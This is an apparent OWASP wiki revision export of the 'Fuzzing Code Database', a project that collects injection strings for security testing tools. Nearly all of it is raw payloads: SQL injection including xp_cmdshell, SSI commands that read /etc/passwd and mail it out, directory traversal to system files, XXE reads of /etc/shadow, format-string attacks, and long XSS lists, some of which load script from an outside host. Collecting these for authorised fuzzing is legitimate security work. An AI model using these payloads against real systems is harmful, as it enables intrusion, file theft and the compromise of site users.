';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}<br />
'';!--&lt;XSS&gt;=&amp;{()}"<br />
</pre> <br />
<br><br />
<br />
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===<br />
<pre>Statements<br />
count(/child::node())<br />
x' or name()='username' or 'x'='y<br />
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;<br />
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;<br />
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"<br />
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
</pre> <br />
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===<br />
<pre>%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;<br />
</pre> <br />
==== Project Contributor ====<br />
<br />
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] <br />
<br />
Reviewer: [[:User:eneves|'''Eduardo Neves''']] <br />
<br />
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] <br />
<br />
==== Feedback and Participation ====<br />
<br />
We hope you find the Fuzzing Code Database useful. Please contribute to the project by volunteering for one of the tasks or by sending your comments, questions, and suggestions to wagner.elias |at| owasp.org <br />
<br />
==== Project Identification ====<br />
<br />
{{Template:OWASP Project Identification Tab<br />
| project_name = OWASP Fuzzing Code Database<br />
| leader_name = Wagner Elias<br />
| leader_username = Wagner.elias<br />
| mailing_list_name = owasp-fuzzing-code-database<br />
}} __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category_talk:OWASP_Fuzzing_Code_Database&diff=67535
Category talk:OWASP Fuzzing Code Database
2009-08-12T18:20:22Z
<p>Foobar23: </p>
<hr />
<div>Regarding: Contributors <br/><br />
Would you please add me to the contributors cause I initiated this project in the past and added a lot of code.<br/><br />
Name: Florian Roth<br/><br />
[[User:Foobar23|Foobar23]] 18:20, 12 August 2009 (UTC)</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category_talk:OWASP_Fuzzing_Code_Database&diff=67534
Category talk:OWASP Fuzzing Code Database
2009-08-12T18:17:21Z
<p>Foobar23: Created page with 'Contributors: Would you please add me to the contributors cause I initiated this project in the past and added a lot of code. Name: Florian Roth'</p>
<hr />
<div>Contributors:<br />
Would you please add me to the contributors cause I initiated this project in the past and added a lot of code.<br />
Name: Florian Roth</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=28942
Category:OWASP Fuzzing Code Database
2008-05-06T15:44:58Z
<p>Foobar23: </p>
<hr />
<div>This database is a collection of statements used in code injection software. All too often, security professionals rely on their own repositories of statements, collected from several projects over a long time. We want to collect all these statements and combine them, merging the databases of several projects like [[WebScarab]] and [[JBroFuzz]], to build a large dataset of effective statements that provides better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
</pre><br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
</pre><br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''<br />
<br />
=== XSS Statements - Most effective/most common statements ===<br />
<br />
Testing Statements<br />
<pre><br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <br />
'';!--"<XSS>=&{()}<br />
</pre><br />
<br />
Common exploit code (covers a lot of XSS vulnerabilities)<br />
<pre><br />
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='<br />
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="<br />
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
=== XSS Statements - Full List ===<br />
<br />
<pre><br />
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><br />
<IMG SRC="javascript:alert('XSS');"><br />
<IMG SRC=javascript:alert('XSS')><br />
<IMG SRC=JaVaScRiPt:alert('XSS')><br />
<IMG SRC=javascript:alert(&quot;XSS&quot;)><br />
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`><br />
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"><br />
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))><br />
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><br />
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041><br />
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29><br />
<IMG SRC="jav ascript:alert('XSS');"><br />
<IMG SRC="jav&#x09;ascript:alert('XSS');"><br />
<IMG SRC="jav&#x0A;ascript:alert('XSS');"><br />
<IMG SRC="jav&#x0D;ascript:alert('XSS');"><br />
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out<br />
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out<br />
<IMG SRC=" &#14; javascript:alert('XSS');"><br />
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><br />
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<<SCRIPT>alert("XSS");//<</SCRIPT><br />
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B><br />
<SCRIPT SRC=//ha.ckers.org/.j><br />
<IMG SRC="javascript:alert('XSS')"<br />
<iframe src=http://ha.ckers.org/scriptlet.html <<br />
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT><br />
\";alert('XSS');//<br />
</TITLE><SCRIPT>alert("XSS");</SCRIPT><br />
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"><br />
<BODY BACKGROUND="javascript:alert('XSS')"><br />
<BODY ONLOAD=alert('XSS')><br />
<IMG DYNSRC="javascript:alert('XSS')"><br />
<IMG LOWSRC="javascript:alert('XSS')"><br />
<BGSOUND SRC="javascript:alert('XSS');"><br />
<BR SIZE="&{alert('XSS')}"><br />
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER><br />
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"><br />
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"><br />
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE><br />
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"><br />
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><br />
<XSS STYLE="behavior: url(xss.htc);"><br />
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS<br />
<IMG SRC='vbscript:msgbox("XSS")'><br />
¼script¾alert(¢XSS¢)¼/script¾<br />
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"><br />
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><br />
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"><br />
<IFRAME SRC="javascript:alert('XSS');"></IFRAME><br />
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><br />
<TABLE BACKGROUND="javascript:alert('XSS')"><br />
<TABLE><TD BACKGROUND="javascript:alert('XSS')"><br />
<DIV STYLE="background-image: url(javascript:alert('XSS'))"><br />
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><br />
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"><br />
<DIV STYLE="width: expression(alert('XSS'));"><br />
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><br />
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><br />
<XSS STYLE="xss:expression(alert('XSS'))"><br />
exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'><br />
<STYLE TYPE="text/javascript">alert('XSS');</STYLE><br />
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><br />
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><br />
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--><br />
<BASE HREF="javascript:alert('XSS');//"><br />
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT><br />
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT><br />
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED><br />
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED><br />
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML><br />
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><br />
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN><br />
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><br />
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML><br />
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><br />
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--><br />
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?><br />
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"><br />
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<br />
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<A HREF="http://66.102.7.147/">XSS</A><br />
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A><br />
<A HREF="http://1113982867/">XSS</A><br />
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A><br />
<A HREF="http://0102.0146.0007.00000223/">XSS</A><br />
<A HREF="h\ntt\tp://6&#9;6.000146.0x7.147/">XSS</A><br />
<A HREF="//www.google.com/">XSS</A><br />
<A HREF="//google">XSS</A><br />
<A HREF="http://google.com/">XSS</A><br />
<A HREF="http://www.google.com./">XSS</A><br />
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A><br />
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<div onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="javascript:document.write("XSS-XSS-XSS");"><br />
<img dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<bgsound src="javascript:document.write("XSS-XSS-XSS");"><br />
&<script>document.write("XSS-XSS-XSS");</script><br />
&{document.write("XSS-XSS-XSS");};<br />
<img src=&{document.write("XSS-XSS-XSS");};><br />
<link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"><br />
<iframe src="vbscript:document.write("XSS-XSS-XSS");"><br />
<img src="mocha:document.write("XSS-XSS-XSS");"><br />
<img src="livescript:document.write("XSS-XSS-XSS");"><br />
<a href="about:<s&#99;ript>document.write("XSS-XSS-XSS");</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"><br />
<body onload="document.write("XSS-XSS-XSS");"><br />
<div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression(document.write("XSS-XSS-XSS"););"><br />
<style type="text/javascript">document.write("XSS-XSS-XSS");</style><br />
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"><br />
<style><!--</style><script>document.write("XSS-XSS-XSS");//--></script><br />
<![CDATA[<!--]]><script>document.write("XSS-XSS-XSS");//--></script><br />
<!-- -- --><script>document.write("XSS-XSS-XSS");</script><!-- -- --><br />
<<script>document.write("XSS-XSS-XSS");</script><br />
<img src="blah"onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="blah>" onmouseover="document.write("XSS-XSS-XSS");"><br />
<xml src="javascript:document.write("XSS-XSS-XSS");"><br />
<xml id="X"><a><b>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<div onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="javascript:document.write("XSS-XSS-XSS");"><br />
<img dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
